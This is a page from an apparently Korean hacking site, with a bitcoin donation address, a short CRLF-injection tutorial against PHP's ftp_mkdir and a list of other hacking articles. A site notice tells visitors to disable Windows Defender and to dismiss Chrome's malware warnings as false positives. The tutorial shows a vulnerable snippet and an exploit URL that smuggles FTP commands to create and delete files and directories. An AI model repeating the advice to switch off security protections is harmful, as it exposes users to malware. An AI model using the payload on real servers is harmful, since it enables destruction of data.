::::: 해커즈뉴스 / 해커몰 :::::

해커즈뉴스 / 해커대학

Donation bitcoin(기부용 비트코인 주소)

1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4

기부하신 비트코인은 "보안 취약 계층"을 위해 사용되고 있습니다.

Donation bitcoin(기부용 비트코인 주소)

1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4

기부하신 비트코인은 "보안 취약 계층"을 위해 사용되고 있습니다.

공지

1. MS 엣지 브라우저에서의 경고창은 '윈도우 디펜더'를 끄시면 됩니다.

'윈도우 디펜더 끄기'

2. 크롬 브라우저로 접속시 나오는 악성코드 경고창은 구글 크롬의 에러, 즉 오탐(탐지 오류)이므로 무시하시면 됩니다.

3. 이 사이트는 안전하며 깨끗하다는 것을 알려 드립니다.

4. 무고한 사이트들에 대한 공룡 기업 브라우저들의 무차별적인 '탐지 오류 횡포'가 사용자들의 정보 공유의 자유를 침해하고 있습니다. 이에 대응하여 이 기업들을 상대로 소송을 준비하고 있습니다.

출처: 조태형

장르: 웹해킹

crlf 공격

PHP의 FTP 함수를 보면 ftp_mkdir 같은 함수들을 찾아 볼 수 있다.
이 함수는 ftp_mkdir 이름을 보면 알 수 있듯이 ftp 접속 후 디렉터리를 만들어내는 함수이다.
하지만 이 함수의 파라미터인 command 인자값에 만들 디렉터리명을 넣게 되어 있는데..
이 인자값에 만들 디렉터리명\r\n다른명령어 를 넣어 다른 명령을 실행 할 수 있다.
예를 들면 다음과 같다.

<?php$ftp_server='http://www.loveshell.net';$ftp_user_name='loveshell';$ftp_user_pass='loveshell';$command = $_GET['dir'];$conn_id = ftp_connect($ftp_server);$login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);if($command) ftp_mkdir($conn_id, $command);.......
위 소스를 공략하여 익스플로잇을 제작하면.. 다음과 같다.

http://test.net/test.php?dir=loveshell%0D%0AMKD jnc%0D%0ADELE jnc.txt%0D%0Armd test
위 익스플로잇을 살펴보면..
iloveshell 디렉터리를 만들고 난 후 jnc 디렉터리를 만들어낸다. 그리고 jnc.txt를 지우고 test
라는 디렉터리를 지운다. (0D 0A <-- 헥사코드로 \r\n 인건 아시죠?)

위 익스플로잇은 php 5.1.6에서 테스트 되었으며 다른 함수 또한 취약점을 가지고 있다.

문서번호	장르	문서명	출처	첨부

이곳에서는 웹해킹에 대한 문서들을 제공합니다.

58	웹쉘	웹쉘 대응방법 - 실제 샘플 이용	조태형

57	세션어택	세션 관리 취약점(Session Management Vulenrabi...	조태형

56	웹해킹	공개 웹방화벽 2종 세트	조태형

55	웹해킹	crlf 공격	조태형

54	웹해킹	필수 웹해킹 Tools	조태형

53	웹해킹	XSS 해킹 시연 동영상	조태형

52	DoS	SYN 플러딩 공격 확인과 방어법(winNT/2K)	이동화

51	웹해킹	웹사이트 침해사고 예방 방법	김민성

50	웹해킹	웹관리자를 위한 응급처치법-SQL Injection 해킹...	박상옥

49	시스템	실행중인 프로세스를 감염시키기	세벌쉭

48	시스코	Exploiting Cisco Systems	Cyvamp

47	웹해킹	ARP 데이블 변경하기 V1.0 - 영문	DataWizard